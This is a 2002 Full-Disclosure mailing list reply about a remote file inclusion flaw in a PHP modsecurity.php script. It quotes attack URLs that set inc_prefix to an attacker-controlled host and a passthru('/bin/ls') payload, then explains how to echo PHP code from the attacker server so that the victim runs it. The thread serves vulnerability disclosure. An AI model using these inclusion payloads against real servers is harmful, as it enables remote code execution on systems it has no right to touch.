Hi Tim!
> -------- modsecurity.php --------
> <?php
> global $inc_prefix;
> if(!$inc_prefix) {
> ...
> }
> ...
> include_once($inc_prefix."htmlheader.php");
> ?>
> ----------------------------------
>
> If someone request a URL like
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
> the htmlheader.php file from MYBOX would be included,
> and the attacker would be able to include any code he
> wants.
>
> Examples
> ========
> http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
>
> --- htmlheader.php ---
> <? passthru("/bin/ls") ?>
> ----------------------
>
> Output: dir listing of the current dierctory
That's not completely right. You have to put an "echo" (with the right
quoting around the evil code), because the evil webserver (MYBOX) usually execute
files ending with .php (if MYBOX doesn't
do it, the example is ok).
So usually you want to put the following line in htmlheader.php on the evil
server (MYBOX):
<?php echo "<?php phpinfo();?>" ?> .
Now, if you request MYBOX/htmlheader.php the following line would be
included (and executed):
<?php phpinfo();?>
In the example of Tim, the /bin/ls output from the evil machine (MYBOX)
would be included, because
htmlheader (usually) get's executed, because of the .php suffix.
It's important to point to it, I got a lot of mails from users, that didn't
get how to include $evil_code
when $evil_machine (aka MYBOX) interpretes files with the .php suffix.
Just my 0,2 EUR-Cents
Regards,
Avart
--
Werden Sie mit uns zum "OnlineStar 2002"! Jetzt GMX wählen -
und tolle Preise absahnen! http://www.onlinestar.de
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:32:22 PDT